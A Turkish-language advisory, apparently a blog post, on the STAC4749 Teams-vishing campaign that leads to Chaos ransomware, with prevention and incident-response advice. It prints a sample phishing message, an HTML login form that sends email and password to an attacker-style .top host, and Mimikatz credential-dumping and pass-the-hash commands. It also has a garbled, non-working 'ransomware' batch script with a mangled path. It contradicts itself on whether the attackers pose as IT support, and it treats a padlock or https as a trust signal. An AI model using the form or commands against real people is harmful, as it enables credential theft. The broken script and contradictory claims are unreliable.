Sorun Tanımı
STAC4749 operasyonu, Sophos tarafından Ağustos 2024'te keşfedilen ve Microsoft Teams platformunu hedef alan vishing (sesli phishing) saldırıları ile başlayan sofistike bir siber saldırı zinciridir. Geleneksel IT destek kılığına bürünmeyen bu saldırı, 17 saatten kısa sürede Chaos ransomware dağıtımına kadar ilerlemektedir. Saldırganlar, .top alan adlarını, gerçekçi çalışan isimlerini ve uzaktan erişim araçlarını kullanarak North Amerika'daki düzinelerce kuruluşu hedef almıştır.
Saldırının Ana Bileşenleri
- Başlangıç Vektörü: Saldırganlar, Microsoft Teams üzerinden hedef çalışanlara doğrudan mesaj göndererek IT destek talebi olarak sunulan sahte yardım önerileriyle temas kurmaktadır.
- Etki Alanı Kullanımı: Operasyon,
.topalan adı uzantısını kullanarak kurumsal ortamda geçerliymiş gibi görünen sahte web siteleri ve kimlik doğrulama sayfaları oluşturmuştur. - Sosyal Mühendislik: Saldırganlar, hedef organizasyonun çalışanlarına ait gerçekçi isimler ve roller kullanarak güvenilirliği artırmaktadır.
- Hızlı Yatay Hareket: Kurbanın sistemine erişim sağlandıktan sonra, saldırganlar uzaktan erişim araçları (örn. AnyDesk, TeamViewer) aracılığıyla ağ içinde hızla yayılmaktadır.
- Ransomware Dağıtımı: 17 saatten kısa sürede, Chaos ransomware yükü dağıtılarak kurumsal veriler şifrelenmekte ve fidye talebi sunulmaktadır.
Saldırı Adımları ve Teknik Detaylar
1. İlk Temas: Microsoft Teams Vishing
Saldırganlar, hedef organizasyonun çalışanlarına doğrudan Microsoft Teams mesajları göndermektedir. Bu mesajlar genellikle aşağıdaki içeriklere sahiptir:
- Konu: "IT Destek Talebi" veya "Acil Sistem Kontrolü"
- İçerik: "Merhaba, sisteminizde bir güvenlik açığı tespit edildi. Lütfen aşağıdaki bağlantıya tıklayarak sorunu çözün."
Örnek Saldırı Mesajı
Kimden: IT Destek
Konu: Acil: Sistem Güvenlik Açığı Tespiti
Merhaba [Çalışan Adı],
Sistemimizde bir güvenlik açığı tespit edildi. Lütfen aşağıdaki bağlantıya tıklayarak sorunu acilen çözün:
https://secure-fix.companyxyz.top/update
Teşekkürler,
IT Destek Ekibi
Uyarı: Resmi olmayan IT destek taleplerine asla yanıt vermeyin. Microsoft Teams üzerinden gelen mesajların kaynağını doğrulamak için doğrudan şirket IT departmanınızı arayın veya resmi destek kanallarını kullanın.
2. Sahte Web Siteleri ve Kimlik Doğrulama
Saldırganlar, .top alan adlarını kullanarak kurumsal ortamda geçerliymiş gibi görünen sahte web siteleri oluşturmuştur. Bu siteler genellikle aşağıdaki özelliklere sahiptir:
- Kurumsal e-posta giriş sayfaları
- VPN veya uzaktan erişim portalları
- Microsoft 365 veya Azure kimlik doğrulama sayfaları
Sahte Kimlik Doğrulama Sayfası Örneği
<html>
<head><title>Microsoft 365 - Güvenlik Doğrulama</title></head>
<body>
<form action="https://companyxyz.top/auth/login.php" method="POST">
<label>E-posta Adresi:</label>
<input type="text" name="email" placeholder="user@company.com" required>
<label>Şifre:</label>
<input type="password" name="password" required>
<button type="submit">Giriş Yap</button>
</form>
</body>
</html>
İpucu: Tarayıcınızın adres çubuğundaki kilit simgesi ve URL'nin https:// ile başlaması, site güvenilirliği konusunda ilk göstergedir. Resmi olmayan domainlerdeki sitelerden asla kimlik bilgilerinizi girmeyin.
3. Uzaktan Erişim ve Ağ İçinde Yayılma
Kimlik bilgileri ele geçirildiğinde, saldırganlar aşağıdaki adımları izleyerek ağ içinde yayılmaktadır:
- AnyDesk/TeamViewer Kurulumu: Kurbanın sistemine uzaktan erişim araçları yüklenir.
- Yatay Hareket: Saldırganlar, Active Directory üzerinden diğer sistemlere erişim sağlamak için Pass-the-Hash veya Pass-the-Ticket saldırıları gerçekleştirir.
- Yönetici Ayrıcalıkları Elde Etme: Yerel yönetici hesaplarının şifreleri ele geçirilerek ağın tam kontrolü hedeflenir.
Yayılma Komutları (PowerShell)
# Aktif dizin kullanıcılarını listele
Get-ADUser -Filter * -Properties * | Select-Object SamAccountName, UserPrincipalName, Enabled
# Yerel yönetici hesaplarının şifrelerini sızdırma (Mimikatz kullanımı)
sekurlsa::logonpasswords
# Pass-the-Hash saldırısı
sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:HASH
4. Chaos Ransomware Dağıtımı
Saldırganlar, ağın tam kontrolünü ele geçirdikten sonra Chaos ransomware yükünü aşağıdaki adımlarla dağıtmaktadır:
- Ransomware Bulaştırma:
\networkileolder ansomware.exeyoluyla tüm ağdaki sistemlere bulaştırılır. - Dosya Şifreleme:
.chaosuzantısı eklenerek dosyalar şifrelenir. - Fidye Notu:
README_TO_DECRYPT.txtdosyasıyla kurbanlara şifre çözme talimatları sunulur.
Chaos Ransomware Komut Dosyası Örneği
@echo off
set TARGET_DIR=\networkileolder
set RANSOMWARE=ransomware.exe
for /R %TARGET_DIR% %%F in (*) do (
if not %%~xF==.chaos (
copy "%RANSOMWARE%" "%%F.chaos"
del "%%F"
)
)
Önemli: Fidye ödemesi asla önerilmez. Fidye ödendiğinde bile verilerinizin geri yüklenmesi garanti edilmemektedir. Ransomware saldırılarına karşı yedekleme stratejileri ve erişim kontrolleri hayati önem taşır.
Korunma ve Müdahale Yöntemleri
1. Önleyici Tedbirler
- Eğitim ve Farkındalık:
- Çalışanlara vishing ve phishing saldırıları konusunda düzenli eğitimler verin.
- Sahte e-posta ve mesajları tanıma konusunda simülasyonlar gerçekleştirin.
- Çok Faktörlü Kimlik Doğrulama (MFA):
- Tüm Microsoft 365, VPN ve uzaktan erişim sistemlerine MFA uygulayın.
- MFA yöntemleri olarak Microsoft Authenticator, Google Authenticator veya donanım tokenleri kullanın.
- Güvenlik Yazılımları:
- Gelişmiş EPP/EDR çözümleri (örn. CrowdStrike, SentinelOne) kullanarak anormal davranışları tespit edin.
- Microsoft Defender for Office 365 ve Microsoft Defender for Endpoint gibi araçlarla e-posta ve uç nokta koruması sağlayın.
- Domain ve SSL Kontrolleri:
.top,.gqgibi şüpheli alan adlarını bloke edin.- SSL sertifikalarının geçerliliğini otomatik olarak doğrulayın.
- Uzaktan Erişim Politikaları:
- AnyDesk/TeamViewer kullanımını kısıtlayın ve yalnızca onaylı araçların kullanımına izin verin.
- Uzaktan erişim için VPN ve Zero Trust mimarisi uygulayın.
2. Acil Müdahale Adımları
Saldırı tespit edildiğinde aşağıdaki adımları izleyin:
- Saldırıyı İzole Edin:
- Etkilenen sistemleri ağdan fiziksel olarak ayırın.
- VPN bağlantılarını kapatın ve uzaktan erişim araçlarını devre dışı bırakın.
- Kimlik Bilgilerini Sıfırlayın:
- Tüm kurumsal hesapların şifrelerini değiştirin.
- MFA cihazlarını ve tokenlerini yeniden oluşturun.
- Logları İnceleyin:
- Microsoft 365, Active Directory ve güvenlik yazılımlarından logları toplayın.
- Saldırının kaynağını ve yayılma yolunu belirleyin.
- Ransomware Temizleme:
- Etkilenen sistemleri temiz bir yedekten geri yükleyin.
- Saldırganlar tarafından bırakılan sürekli erişim (persistence) mekanizmalarını temizleyin.
- Yasal ve İletişim Yükümlülüklerini Yerine Getirin:
- Saldırıyı veri koruma yetkililerine bildirin (örn. KVKK, GDPR).
- Müşterilerinizi ve iş ortaklarınızı şeffaf bir şekilde bilgilendirin.
3. İyileştirme ve Sürekli İzleme
- Güvenlik Politikalarını Güncelleyin: Uzaktan erişim, kimlik doğrulama ve ağ izolasyonu konularında politikaları revize edin.
- Sürekli İzleme ve Tespit: SIEM çözümleri (örn. Splunk, IBM QRadar) kullanarak ağ trafiğini ve uç nokta aktivitelerini sürekli izleyin.
- Yedekleme Stratejilerini Gözden Geçirin:
- 3-2-1 kuralını uygulayın (3 kopya, 2 farklı ortam, 1 offsite).
- Yedekleri okunamaz ve izole edilmiş ortamlarda saklayın.
- Saldırı Simülasyonları: Düzenli olarak penetrasyon testleri ve saldırı simülasyonları gerçekleştirin.
Sonuç
STAC4749 operasyonu, siber saldırganların sosyal mühendislik ve hızlı saldırı zincirleri kullanarak kurumsal ağlara sızma yöntemlerinde ne kadar ileri gittiklerini göstermektedir. Geleneksel IT destek kılığına bürünmeyen bu saldırılar, çalışan farkındalığı, çok katmanlı güvenlik kontrolleri ve hızlı müdahale planları gerektirmektedir. Kurumlar, MFA, EDR çözümleri, güvenlik eğitimleri ve yedekleme stratejileri gibi temel güvenlik önlemlerini uygulamalıdır. Unutulmamalıdır ki, siber güvenlik bir süreçtir, sonuç değil.


